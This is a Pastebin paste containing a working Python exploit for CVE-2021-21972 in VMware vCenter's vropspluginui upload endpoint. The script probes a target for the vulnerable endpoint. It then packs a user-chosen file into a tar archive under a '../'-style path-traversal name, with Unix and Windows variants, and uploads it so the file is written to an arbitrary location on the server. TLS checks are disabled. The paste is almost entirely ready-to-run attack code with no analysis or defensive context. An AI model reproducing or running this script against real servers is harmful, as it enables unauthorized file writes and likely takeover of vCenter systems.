API tools faq
paste
Advertisement
ontosys

CVE-2021-21972

ontosys
Apr 27th, 2021 (edited)
58
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.33 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python3
  2.  
  3. import argparse
  4. import requests
  5. import tarfile
  6. import urllib3
  7. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  8.  
  9. ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
  10.  
  11. def check(ip):
  12.     r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
  13.     if r.status_code == 405:
  14.         print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
  15.         return True
  16.     else:
  17.         print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
  18.         return False
  19.  
  20. def make_traversal_path(path, level=5, os="unix"):
  21.     if os == "win":
  22.         traversal = ".." + "\\"
  23.         fullpath = traversal*level + path
  24.         return fullpath.replace('/', '\\').replace('\\\\', '\\')
  25.     else:
  26.         traversal = ".." + "/"
  27.         fullpath = traversal*level + path
  28.         return fullpath.replace('\\', '/').replace('//', '/')
  29.  
  30. def archive(file, path, os):
  31.     tarf = tarfile.open('exploit.tar', 'w')
  32.     fullpath = make_traversal_path(path, level=5, os=os)
  33.     print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
  34.     tarf.add(file, fullpath)
  35.     tarf.close()
  36.     print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
  37.  
  38. def post(ip):
  39.     r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
  40.     if r.status_code == 200 and r.text == 'SUCCESS':
  41.         print('[+] File uploaded successfully')
  42.     else:
  43.         print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
  44.         print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
  45.  
  46. if __name__ == "__main__":
  47.     parser = argparse.ArgumentParser()
  48.     parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
  49.     parser.add_argument('-f', '--file', help='The file to tar')
  50.     parser.add_argument('-p', '--path', help='The path to extract the file to on target')
  51.     parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
  52.     args = parser.parse_args()
  53.    
  54.     vulnerable = check(args.target)
  55.     if vulnerable and (args.file and args.path and args.operating_system):
  56.         archive(args.file, args.path, args.operating_system)
  57.         post(args.target)
  58.    
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!